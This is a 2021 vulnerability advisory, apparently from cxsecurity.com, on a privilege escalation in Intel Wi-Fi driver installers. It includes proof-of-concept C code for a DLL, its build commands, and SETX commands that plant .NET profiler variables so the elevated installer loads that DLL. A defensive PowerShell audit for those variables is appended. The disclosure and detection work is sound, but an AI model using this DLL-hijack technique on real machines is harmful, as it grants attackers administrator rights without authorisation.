Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation

2021.04.27
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

Hi @ll,

the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows 10 Wi-Fi Drivers for Intel Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.

CVSS 3.0 score:  8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Demonstration:
~~~~~~~~~~~~~~

0. Log on with an arbitrary user account.

1. Save the following source as poc.c in an arbitrary directory:

--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@nexgo.de>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, CONTEXT *lpContext)
{
    WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

    PROCESS_INFORMATION pi;
#if 0
    if (dwReason != DLL_PROCESS_ATTACH)
        return FALSE;
#endif
    if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
                      CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
                      NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    return TRUE;
}
--- EOF ---

2. Start the command prompt of the 32-bit Windows Software Development
   Kit, then run the following command lines to compile poc.c and link
   it as poc.dll:

   CL.exe /Zl /W4 /Ox /GAFy /c poc.c
   LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj kernel32.lib

ALTERNATIVE for steps 1 and 2:

2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
   and save it as poc.dll in an arbitrary directory.

   See <https://skanthak.homepage.t-online.de/sentinel.html> for its
   documentation, and
   <https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>
   for an example how to use it.

3. Logon with the user account created during Windows setup.

4. Download
   <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
   and
   <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>
   and save them in an arbitrary directory.

5. Start a command prompt (UNELEVATED!) and run the following command
   lines (replace <directory> with the pathname of the directory where
   you built or saved poc.dll):

   SETX.exe COR_ENABLE_PROFILING 1
   SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
   SETX.exe COR_PROFILER_PATH <directory>\poc.dll

   JFTR: this is just one method to set these environment variables
         without the need to elevate!

6. Execute WiFi_22.30.0_Driver32_Win10.exe and
   WiFi_22.30.0_Driver64_Win10.exe per double-click, acknowledge the
   UAC prompt, then admire the console windows showing the output of
   WHOAMI.exe running elevated.

stay tuned, and far away from Intel's vulnerable crap!
Stefan Kanthak
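
A defender-side audit for the state that step 5 leaves behind, as an added example that is not part of the original advisory: it lists .NET profiler variables stored in the per-user environment key (where SETX.exe without /M writes) and in the machine-wide key, and checks the referenced DLL. The prefix match on CORECLR_ (the .NET Core counterparts) and the column names are assumptions that go beyond the three variables named above.

```powershell
# Added example: find persisted .NET profiler environment variables.
# Run it in the context of the user who will later elevate an installer,
# because HKCU is per user.
$scopes = [ordered]@{
    User    = 'HKCU:\Environment'
    Machine = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
}

# COR_ENABLE_PROFILING, COR_PROFILER, COR_PROFILER_PATH are the names from
# step 5; the optional CORECLR_ prefix is an assumption beyond the advisory.
$pattern = '^COR(ECLR)?_(ENABLE_PROFILING|PROFILER)'

$findings = foreach ($scope in $scopes.GetEnumerator()) {
    $key = Get-Item -LiteralPath $scope.Value -ErrorAction SilentlyContinue
    if (-not $key) { continue }

    foreach ($name in ($key.GetValueNames() | Where-Object { $_ -match $pattern })) {
        # Read the raw value so REG_EXPAND_SZ data is shown as stored.
        $value = $key.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
        $row = [ordered]@{
            Scope     = $scope.Key
            Name      = $name
            Value     = $value
            DllExists = $null
            Signature = $null
        }

        if ($name -match '_PROFILER_PATH') {
            $dll = [Environment]::ExpandEnvironmentVariables([string]$value)
            $row.DllExists = Test-Path -LiteralPath $dll -PathType Leaf
            if ($row.DllExists) {
                # An unsigned DLL in a user-writable directory deserves a closer look.
                $row.Signature = (Get-AuthenticodeSignature -LiteralPath $dll).Status
            }
        }
        [pscustomobject]$row
    }
}

$findings | Format-Table -AutoSize

# Variables in the User scope can be set without elevation, which is the
# precondition the demonstration relies on.
if ($findings | Where-Object { $_.Scope -eq 'User' }) {
    Write-Warning 'Profiler variables are set in the per-user environment; review them before running elevated installers.'
}
```

An empty result means neither key carries profiler variables; a legitimate profiler or APM agent normally registers itself in the Machine scope with a signed DLL.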


Copyright 2021, cxsecurity.com

 
